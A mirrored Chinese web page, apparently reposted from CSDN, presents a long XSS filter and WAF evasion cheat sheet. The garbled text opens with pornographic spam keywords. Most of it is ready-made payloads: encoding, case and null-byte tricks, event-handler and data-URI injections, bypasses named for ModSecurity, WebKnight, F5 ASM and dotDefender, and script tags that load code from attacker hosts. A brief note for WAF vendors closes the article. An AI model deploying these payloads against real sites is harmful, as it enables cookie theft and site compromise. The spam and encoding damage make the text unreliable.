人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)

發(fā)布日期:2021-12-20 17:03 | 文章來源:CSDN
0x00

我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結(jié)了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類,至于具體每個類別的異同之處,本文不做學(xué)術(shù)介紹,直接介紹實際的插入方式。

四種超級基礎(chǔ)的繞過方法。
1.轉(zhuǎn)換為ASCII碼
例子:原腳本為<script>alert(‘I love F4ck’)</script >
通過轉(zhuǎn)換,變成:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>

2.轉(zhuǎn)換為HEX(十六進制)
例子:原腳本為<script>alert(‘I love F4ck’)</script>
通過轉(zhuǎn)換,變成:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3.轉(zhuǎn)換腳本的大小寫
例子:原腳本為<script>alert(‘I love F4ck’)</script>
轉(zhuǎn)換為:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>

4.增加閉合標(biāo)記”>
例子:原腳本為<script>alert(‘I love F4ck’)</script>
轉(zhuǎn)換為:”><script>alert(‘I love F4ck’)</script>
更詳細(xì)繞過技術(shù)請參考此網(wǎng)頁
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

轉(zhuǎn)換工具使用的是火狐的 hackbar mozilla addon.

0x01 常規(guī)插入及其繞過
1 Script 標(biāo)簽
繞過進行一次移除操作:
<scr<script>ipt>alert("XSS")</scr<script>ipt>
Script 標(biāo)簽可以用于定義一個行內(nèi)的腳本或者從其他地方加載腳本:
<script>alert("XSS")</script>
<script src="http://attacker.org/malicious.js"></script>
2 JavaScript 事件
我們可以像如下這樣在元素中定義 JavaScript 事件:
<div onclick="alert('xss')">
這個 JavaScript 代碼當(dāng)有人點擊它后就會被執(zhí)行,同時還有其他事件如頁面加載或移動鼠標(biāo)都可以觸發(fā)這些事件。絕大部分的時間都被過濾器所移除了,但是依舊還有少量事件沒有被過濾,例如,onmouseenter 事件:<div onmouseenter="alert('xss')">當(dāng)用戶鼠標(biāo)移動到 div 上時就會觸發(fā)我們的代碼。
另一個繞過的辦法就是在屬性和= 之間插入一個空格:
<div onclick ="alert('xss')">
3 行內(nèi)樣式(Inline style)
我們同樣可以在行內(nèi)樣式里利用 IE 瀏覽器支持的動態(tài)特性:
<div style="color: expression(alert('XSS'))">
過濾器會檢查關(guān)鍵字 style,隨后跟隨的不能是 <,在隨后是 expression:
/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
所以,讓我們需要把 < 放到其他地方:
<div style="color: '<'; color: expression(alert('XSS'))">
4 CSS import
IE 瀏覽器支持在 CSS 中擴展 JavaScript,這種技術(shù)稱為動態(tài)特性(dynamic properties)。允許攻擊者加載一個外部 CSS 樣式表是相當(dāng)危險的,因為攻擊者現(xiàn)在可以在原始頁面中執(zhí)行 JavaScript 代碼了。
<style>
@import url("http://attacker.org/malicious.css");
</style>
malicious.css:
body {
color: expression(alert('XSS'));
}
為了繞過對 @import 的過濾,可以在 CSS 中使用反斜杠進行繞過:
<style>
@imp\ort url("http://attacker.org/malicious.css");
</style>
IE 瀏覽器會接受反斜杠,但是我們繞過了過濾器。
5 Javascript URL
鏈接標(biāo)簽里可以通過在 URL 中使用 javascript:… 來執(zhí)行 JavaScript:
<a href="javascript:alert('test')">link</a>
上面的過濾會從代碼中移除 javascript:,所以我們不能直接這么寫代碼。但我們可以嘗試改變 javascript:的寫法,使它依舊可以被瀏覽器執(zhí)行但又不匹配正則表達(dá)式。首先來嘗試下 URL 編碼:
<a href="java&#115;cript:alert('xss')">link</a>
上面這段代碼不匹配正則表達(dá)式,但是瀏覽器依舊會執(zhí)行它,因為瀏覽器會首先進行 URL 解碼操作。
另外,我們還可以使用 VBScript,雖然它在 IE11 中被禁用了,但依舊可以運行在舊版本的 IE 或者啟用兼容模式的 IE11 上。我們可以使用類似上面 JavaScript 的方式來插入 VBScript 代碼:
<a href='vbscript:MsgBox("XSS")'>link</a>
'-confirm`1`-'

'-confirm(1)-'

1 利用字符編碼

%c1;alert(/xss/);//

2 繞過長度限制

"onclick=alert(1)//
"><!--
--><script>alert(xss);<script>

3 使用<base>標(biāo)簽

<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>
<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
<script>+alert(88199)</script>
<script>alert(/88199/)</script>
<script src=data:text/javascript,alert(88199)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>
<script>alert(String.fromCharCode(49,49))</script>
<script>alert(/88199/.source)</script>
<script>setTimeout(alert(88199),0)</script>
<script>document['write'](88199);</script>

<anytag onmouseover=alert(15)>M
<anytag onclick=alert(16)>M
<a onmouseover=alert(17)>M
<a onclick=alert(18)>M
<a href=javascript:alert(19)>M
<button/onclick=alert(20)>M
<form><button
formaction=javascript&colon;alert(21)>M
<form/action=javascript:alert(22)><input/type=submit>
<form onsubmit=alert(23)><button>M
<form onsubmit=alert(23)><button>M
<img src=x onerror=alert(24)> 29
<body/onload=alert(25)>

<body
onscroll=alert(26)><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<input autofocus>

<iframe src="http://0x.lv/xss.swf"></iframe>
<iframe/onload=alert(document.domain)></iframe>
<IFRAME SRC="javascript:alert(29);"></IFRAME>
<meta http-equiv="refresh" content="0;
url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
<object data="javascript:alert(document.domain)">


<marquee onstart=alert(30)></marquee>
<isindex type=image src=1 onerror=alert(31)>
<isindex action=javascript:alert(32) type=image>
<input onfocus=alert(33) autofocus>
<input onblur=alert(34) autofocus><input autofocus>
0x03 規(guī)則探測及繞過
1WAF規(guī)則探測
1、使用無害的payload,類似<b>,<i>,<u>觀察響應(yīng),判斷應(yīng)用程序是否被HTML編碼,是否標(biāo)簽被過濾,是否過濾<>等等;
2、如果過濾閉合標(biāo)簽,嘗試無閉合標(biāo)簽的payload(<b,<i,<marquee)觀察響應(yīng);
3、嘗試以下的payload
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>

<script src="http://rhainfosec.com/evil.js">

2 大小寫混合字符
<scRiPt>alert(1);</scrIPt>
1、如果大小寫不行的話,<script>被過濾嘗試<scr<script>ipt>alert(1)</scr<script>ipt>;
2、使用<a>標(biāo)簽測試
<a href=“http://www.google.com">Clickme</a>
<a被過濾?
href被過濾?
其他內(nèi)容被過濾?
如果沒有過濾嘗試使用
<a href=”javascript:alert(1)”>Clickme</a>
嘗試使用錯誤的事件查看過濾
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
HTML5擁有150個事件處理函數(shù),可以多嘗試其他函數(shù)
<body/onhashchange=alert(1)><a href=#>clickit
3 測試其他標(biāo)簽
src屬性
<img src=xonerror=prompt(1);>
<img/src=aaa.jpgonerror=prompt(1);
<video src=xonerror=prompt(1);>
<audio src=xonerror=prompt(1);>
iframe
<iframesrc="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
Embed
<embed/src=//goo.gl/nlX0P>
Action
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
mario驗證
<span class="pln"> </span><span class="tag">&lt;formaction</span><span class="pun">=</span><span class="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class="tag">&gt;&lt;button&gt;</span><span class="pln">CLICK</span>
“formaction”屬性
<isindexformaction="javascript:alert(1)"type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME
“background”屬性
<table background=javascript:alert(1)></table> // Works on Opera 10.5and IE6
“posters” 屬性
<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
“data”屬性
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?
“code”屬性
<applet code="javascript:confirm(document.cookie);"> // Firefox Only
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
事件處理
<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
短payload
<q/oncut=open()>
<q/oncut=alert(1)> //Useful in-case of payload restrictions.
嵌套欺騙
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbsonload=alert-1 // Works with IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>// Works with IE8
圓括號被過濾
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;
Expression 屬性
<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(&#039;&#039;x:expression(alert(1))"></div>// Works upto IE7.
<style>#test{x:expression(alert(/XSS/))}</style>// Works upto IE7
“location”屬性
<a onmouseover=location=’javascript:alert(1)>click
<body onfocus="location=&#039;javascrpt:alert(1) >123
其他Payload
<meta http-equiv="refresh"content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh"content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><gonload="javascript:\u0061lert(1);"></g></svg> //By @secalert
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"values=";javascript:alert(1)" begin="0s"dur="0.1s" fill="freeze"/> // By Mario
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg>// By @secalert
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed
();:被過濾
<svg><script>alert&#40/1/&#41</script>// Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41
Opera的變量
<svg><script>alert&#401&#41 // Works with Opera Only
實體解碼
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
編碼
JavaScript是很靈活的語言,可以使用十六進制、Unicode、HTML等進行編碼,以下屬性可以被編碼
(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)
href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= //只支持base64
4 基于上下文的過濾
WAF最大的問題是不能理解內(nèi)容,使用黑名單可以阻擋獨立的js腳本,但仍不能對xss提供足夠的保護,如果一個反射型的XSS是下面這種形式

1 輸入反射屬性

<input value="XSStest" type=text>
我們可以使用 “><imgsrc=x onerror=prompt(0);>觸發(fā),但是如果<>被過濾,我們?nèi)匀豢梢允褂?ldquo; autofocusonfocus=alert(1)//觸發(fā),基本是使用“ 關(guān)閉value屬性,再加入我們的執(zhí)行腳本
" onmouseover="prompt(0) x="
" onfocusin=alert(1)autofocus x="
" onfocusout=alert(1)autofocus x="
" onblur=alert(1) autofocusa="
輸入反射在<script>標(biāo)簽內(nèi)
類似這種情況:
<script>
Var
x=”Input”;
</script>
通常,我們使用“></script>,閉合前面的</script>標(biāo)簽,然而在這種情況,我們也可以直接輸入執(zhí)行腳本alert(), prompt()
confirm() ,例如:
“;alert(1)//

2 非常規(guī)事件監(jiān)聽

DOMfocusin,DOMfocusout,等事件,這些需要特定的事件監(jiān)聽適當(dāng)?shù)膱?zhí)行。例如:
";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//
此類事件的列表
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

3 超文本內(nèi)容

代碼中的情況如下
<a
href=”Userinput”>Click</a>
可以使用javascript:alert(1)//直接執(zhí)行<a
href=”javascript:alert(1)//”>Click</a>

4 變形

主要包含大小寫和JavaScript變形
javascript&#058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
avascript&#x3A;alert&lpar;document&period;cookie&rpar;// AsharJaved
IE10以下和URI中可以使用VBScript
vbscript:alert(1);
vbscript&#058;alert(1);
vbscr&Tab;ipt:alert(1)"
Data URl
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

5 JSON內(nèi)容

反射輸入
encodeURIComponent(&#039;userinput&#039;)
可以使用
-alert(1)-
-prompt(1)-
-confirm(1)-
結(jié)果
encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

6 輸入反射在svg標(biāo)簽內(nèi)

源碼如下:
<svg><script>varmyvar=”YourInput”;</script></svg>
可以輸入
www.site.com/test.php?var=text”;alert(1)//
如果系統(tǒng)編碼了”字符
<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>
原因是引入了附加的(XML)到HTML內(nèi)容里,可以使用2次編碼處理
瀏覽器BUG

7 字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集編碼,我們可以繞過99% 的WAF過濾。
示例
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
可以控制編碼,提交
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img
src=x onerror=prompt(0);>
可以修改為UTF-32編碼形式
???script?alert(1)?/script?
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

8 空字節(jié)

最長用來繞過mod_security防火墻,形式如下:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
空字節(jié)只適用于PHP 5.3.8以上的版本

9 語法BUG

RFC聲明中節(jié)點名稱不能是空格,以下的形式在javascript中不能運行
<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<%, <//, <!,<?可以被解析成<,所以可以使用以下的payload
<//style=x:expression\28write(1)\29> // Works upto IE7 參考http://html5sec.org/#71
<!--[if]><script>alert(1)</script--> // Works upto IE9 參考http://html5sec.org/#115
<?xml-stylesheettype="text/css"?><rootstyle="x:expression(write(1))"/> // Works in IE7 參考 http://html5sec.org/#77
<%div%20style=xss:expression(prompt(1))>// Works Upto IE7

10 Unicode分隔符

[on\w+\s*]這個規(guī)則過濾了所有on事件,為了驗證每個瀏覽器中有效的分隔符,可以使用fuzzing方法測試0×00到0xff,結(jié)果如下:
IExplorer=[0x09,0x0B,0x0C,0x20,0x3B]
Chrome =[0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox=[0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android =[0x09,0x20,0x28,0x2C,0x3B]
x0b在Mod_security中已經(jīng)被過濾,繞過的方法:
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

11 缺少X-frame選項

通常會認(rèn)為X-frame是用來防護點擊劫持的配置,其實也可以防護使用iframe引用的xss漏洞
Docmodes
IE引入了doc-mode很長時間,提供給老版本瀏覽器的后端兼容性,有風(fēng)險,攻擊情景是黑客可以引用你站點的框架,他可以引入doc-mode執(zhí)行css表達(dá)式
expression(open(alert(1)))
以下POC可以插入到IE7中
<html>
<body>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<iframesrc="https://targetwebsite.com">
</body>
</html>

12 Window.name欺騙

情景:我們用iframe加載一個頁面,我們可以控制窗口的名稱,這里也可以執(zhí)行javascript代碼
POC
<iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//&#039;
name="javascript:alert("XSS")"></iframe>
DOM型XSS
服務(wù)器不支持過濾DOM型的XSS,因為DOM型XSS總是在客戶端執(zhí)行,看一個例子:
<script>
vari=location.hash;
document.write(i);
</script>
在一些情況下,反射型XSS可以轉(zhuǎn)換成DOM型XSS:
http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()
上面的POC只在[.+都被允許的情況下適用,可以使用location.hash注入任何不允許的編碼
Location.hash[1] = : // Defined at the first position afterthe hash.
Location.hash[2]= ( // Defined at the second position afterthe has
Location.hash[3] = ) // Definedat third position after the hash.
如果有客戶端過濾可能不適用

13 ModSecurity繞過

<scri%00pt>confirm(0);</scri%00pt>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec
參考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

5 WEB KNIGHT繞過
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
F5 BIG IP ASM and Palo ALTO繞過
<table background="javascript:alert(1)"></table> //IE6或者低版本Opera
“/><marquee onfinish=confirm(123)>a</marquee>
Dot Defender繞過
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>

<marquee/onstart=confirm(2)>

0x04結(jié)論
黑名單方式永遠(yuǎn)不是最好的解決辦法,但是相對與白名單效率很高,對于WAF供應(yīng)商來說,最好的實踐如下:
1、開發(fā)者和管理員要注意WAF只能緩解攻擊,并且針對已知的弱點的防護只是和源代碼修復(fù)的方法打個時間差;
2、要保持WAF的規(guī)則庫更新;
3、WAF可以配置參數(shù)限制,需要提供手冊用于配置參數(shù)content-length最大最小長度,content-type類型,在入侵時進行告警;

4、如果WAF依據(jù)黑名單,要確??梢宰钄嘁阎臑g覽器BUG,并且相應(yīng)規(guī)則庫要及時更新。

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部